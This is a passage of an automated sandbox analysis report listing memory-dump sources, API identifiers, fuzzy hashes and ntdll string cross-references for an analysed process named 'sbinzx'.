                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: f089a190359689272fe54722c8ef8e695f6286bdd2121d7ed80e67b69c2c6bd5
                                                                                • Instruction ID: 18e83ecf8affbda93086604b14deb5b14d4b2f1a3e11991c1a59cb38636cf8d1
                                                                                • Opcode Fuzzy Hash: f089a190359689272fe54722c8ef8e695f6286bdd2121d7ed80e67b69c2c6bd5
                                                                                • Instruction Fuzzy Hash: 3390027220140402D14471584408746000597D0301F55C061A5164559EC7598ED56765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01BA809B,?,?,?,?,?), ref: 01B62E8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: c947befe4fc240c77a83c97565987dbebf28035fd97c2fab47a4e85c8b044ad1
                                                                                • Instruction ID: dd6bc577f0d56c10ba498b5fff15130e590a44966d891c64497872b77986cad1
                                                                                • Opcode Fuzzy Hash: c947befe4fc240c77a83c97565987dbebf28035fd97c2fab47a4e85c8b044ad1
                                                                                • Instruction Fuzzy Hash: 3290022260140502D10571584408616000A97D0241F95C072A112455AECB258A92A231
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: `vu
                                                                                • API String ID: 0-3883270627
                                                                                • Opcode ID: 94bb9d30dd5fbafbda7a3b9179a818b37cf1aebb334e9e445c8945ac06f48248
                                                                                • Instruction ID: 905457428d21d6e8233ebe5b9743c4661b32c2e049128a5f483ca5ec63fbe3b3
                                                                                • Opcode Fuzzy Hash: 94bb9d30dd5fbafbda7a3b9179a818b37cf1aebb334e9e445c8945ac06f48248
                                                                                • Instruction Fuzzy Hash: 52C0803169531942D1146C0DF8406F5F378EB13655F44637BDC05D7250D585D45503CD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes
                                                                                • String ID: 0Ivw$0Ivw$0Ivw$0Ivw$0Ivw$0Ivw
                                                                                • API String ID: 3446177414-4119021165
                                                                                • Opcode ID: 7e506521c3d4042a45e05e6eb516e23dc5dbd1b90188308421b17b20b54553a8
                                                                                • Instruction ID: 90c950e7f3ee67aa257868640917027b45efc5d25b604540ae9fc3bd98f550bd
                                                                                • Opcode Fuzzy Hash: 7e506521c3d4042a45e05e6eb516e23dc5dbd1b90188308421b17b20b54553a8
                                                                                • Instruction Fuzzy Hash: 6901B972DC45109BDB249A6C74247863AD1B7AF728F1900DDED099B288D770CC81E391
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID:
                                                                                • API String ID: 48624451-0
                                                                                • Opcode ID: 05b5e9d1a1d7dc9803dca93e3080cf47cf3e4918d2def54cf681e300287c2fe7
                                                                                • Instruction ID: b6c05d4df3d7b708dde1200ea95ef96c3b77b7711410d95b4ccf0661e4763815
                                                                                • Opcode Fuzzy Hash: 05b5e9d1a1d7dc9803dca93e3080cf47cf3e4918d2def54cf681e300287c2fe7
                                                                                • Instruction Fuzzy Hash: 9B51D8A5A001167FDF19DBACC89097EFBB8FB58240754C2E9F565D7641D338DE408BA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01B879FA
                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01B879D5
                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 01B879D0, 01B879F5
                                                                                • SsHd, xrefs: 01B3A3E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                • API String ID: 0-929470617
                                                                                • Opcode ID: 2e55da3e6b765fded7f24f74e259c40aa1d984da8aa76c8d2a1b3fddbfc1458c
                                                                                • Instruction ID: 50ddbb1f2317b7786cbdd234f7a224bee80645fa58f6744e7c22387fd3a5a5d2
                                                                                • Opcode Fuzzy Hash: 2e55da3e6b765fded7f24f74e259c40aa1d984da8aa76c8d2a1b3fddbfc1458c
                                                                                • Instruction Fuzzy Hash: F4E1C0716043028FD72DCE78C884B6ABBE4EBC4714F244AADF9A5CB291DB31E955CB41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01B8936B
                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01B89346
                                                                                • GsHd, xrefs: 01B3D874
                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 01B89341, 01B89366
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes
                                                                                • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                • API String ID: 3446177414-576511823
                                                                                • Opcode ID: 5844ee8e396a20e3d4980e7f2ca98968fd162186519dda1c9213f1ef797ab835
                                                                                • Instruction ID: ec219f701cd50b43e7f092329be04de9d9e8b35367de9f535174aed6d20c3253
                                                                                • Opcode Fuzzy Hash: 5844ee8e396a20e3d4980e7f2ca98968fd162186519dda1c9213f1ef797ab835
                                                                                • Instruction Fuzzy Hash: 63E1C6706043428FDB29CF98C880B6ABBE5FFC8718F444AADF9558B281D771E854CB52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-$0$0
                                                                                • API String ID: 1302938615-699404926
                                                                                • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                • Instruction ID: e733b15c7cb3bff2e0b664da94a0162d4c3a801e2b453a7a49a14b3856aee1f6
                                                                                • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                • Instruction Fuzzy Hash: D681C230F052498EEF2D8E6CC6517FEBBB9EF65310F184299E951E7291C73C88408751
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes
                                                                                • String ID: $$@
                                                                                • API String ID: 3446177414-1194432280
                                                                                • Opcode ID: c5139fa198b8a1498bffd0491ef34cfe7fec870ffe697416684030809b340095
                                                                                • Instruction ID: b7aa52cd5074bedfeda8f087024a411971459b3a06deff03804101ca6b1736da
                                                                                • Opcode Fuzzy Hash: c5139fa198b8a1498bffd0491ef34cfe7fec870ffe697416684030809b340095
                                                                                • Instruction Fuzzy Hash: BE811B71D002799BDB399B54CC44BEAB6B4AF49714F1041DAEA1EB7240D7709E84CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes
                                                                                • String ID: 0Ivw$0Ivw$0Ivw$X
                                                                                • API String ID: 3446177414-3775388739
                                                                                • Opcode ID: 3636533c105d75030bd1d7a6fdad88b9182ac5ecbf55416d78bfc23832be524f
                                                                                • Instruction ID: c0d6549985db4bfa0645bda93fe5ee41fadf20f21d7ff8f4c89eeb5344fa2776
                                                                                • Opcode Fuzzy Hash: 3636533c105d75030bd1d7a6fdad88b9182ac5ecbf55416d78bfc23832be524f
                                                                                • Instruction Fuzzy Hash: 6731C23194060AFBCF26DF98D804B8D3BB9FBAA748F0450A9FD0456281D378CA90DF45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                • String ID: 2SFA(
                                                                                • API String ID: 4281723722-1824234363
                                                                                • Opcode ID: 7bd1c7aa8661512009e1c16285b450a545c1d95079006507b5517071011c5ee9
                                                                                • Instruction ID: 25ac17122da470eee8add8c838183e3e479d5e8fadd4146c7c1ad2b4a4002539
                                                                                • Opcode Fuzzy Hash: 7bd1c7aa8661512009e1c16285b450a545c1d95079006507b5517071011c5ee9
                                                                                • Instruction Fuzzy Hash: 4A315871E402299FCF29DFA8D944A9DBBF0FB59320F2041A9E512B7290C7359901CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes
                                                                                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                • API String ID: 3446177414-56086060
                                                                                • Opcode ID: 2bbac44be127b60dec4e89c4fd2389bc4463b37f1199f9efcb542138c95ffb87
                                                                                • Instruction ID: 6b9c9b866b82ef1c2bb3367e5ab12b96740d37c8c2b51edc5d2d365cf2abb304
                                                                                • Opcode Fuzzy Hash: 2bbac44be127b60dec4e89c4fd2389bc4463b37f1199f9efcb542138c95ffb87
                                                                                • Instruction Fuzzy Hash: C9412631A00641DBDB2AEFA8C485B79B7B5FF15B64F1482EDE54187791C774A880CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01BA4888
                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01BA4899
                                                                                • LdrpCheckRedirection, xrefs: 01BA488F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes
                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                • API String ID: 3446177414-3154609507
                                                                                • Opcode ID: 6310cf0a8c2e9af4776ba42ab1d0739f192643a6174a5f0c983866b57e2244ec
                                                                                • Instruction ID: 72800e60b1159245f5beceea4e6a9d2ff23641297e4c03a2f84eacd1add7201c
                                                                                • Opcode Fuzzy Hash: 6310cf0a8c2e9af4776ba42ab1d0739f192643a6174a5f0c983866b57e2244ec
                                                                                • Instruction Fuzzy Hash: F641D432A092919FCB29CE5CE840A267BE5FF49A50B4906EDED45D7311D7B0D800CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes
                                                                                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                                                • API String ID: 3446177414-3526935505
                                                                                • Opcode ID: 34c14463bc5dba3b1f74d288261bfa4fbd21db20c1e90dbb59d85b8d2592ae99
                                                                                • Instruction ID: ca1faee24c8080c9dcc85e7ae7b3d18edea60eb7f5057c8e0b8f647378e0520f
                                                                                • Opcode Fuzzy Hash: 34c14463bc5dba3b1f74d288261bfa4fbd21db20c1e90dbb59d85b8d2592ae99
                                                                                • Instruction Fuzzy Hash: 5F31F638144780EFEB2FABACC509B657BE4FB11B50F0485DDE44287656C7B8A881C751
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintTimes
                                                                                • String ID: $
                                                                                • API String ID: 3446177414-3993045852
                                                                                • Opcode ID: 83daa07fc84474f10d89301b2cd1cfd09c26613e3014845363c057e37f53516f
                                                                                • Instruction ID: 5161e49f07558c3290222f398bc210921b8206cd99fbf3b0a81c3d8a1e4b3e3c
                                                                                • Opcode Fuzzy Hash: 83daa07fc84474f10d89301b2cd1cfd09c26613e3014845363c057e37f53516f
                                                                                • Instruction Fuzzy Hash: E7116132904218EBCF1AAF94E84879C7B71FF55760F108559F926672D0CB719A50CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a3893ed25503c4ffe2e74c704493ddb7d85c992761ac4f4ddc8058d5623e3b1
                                                                                • Instruction ID: a8bbcda69ba638a3c13a1c23c436dffae22a250f7f6a2edfb942f416361e2ce1
                                                                                • Opcode Fuzzy Hash: 3a3893ed25503c4ffe2e74c704493ddb7d85c992761ac4f4ddc8058d5623e3b1
                                                                                • Instruction Fuzzy Hash: 6FE1DC71D00608DFDF29DFAAC980AADBBF1FB49304F2485AEE546A7261D770A941DF10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
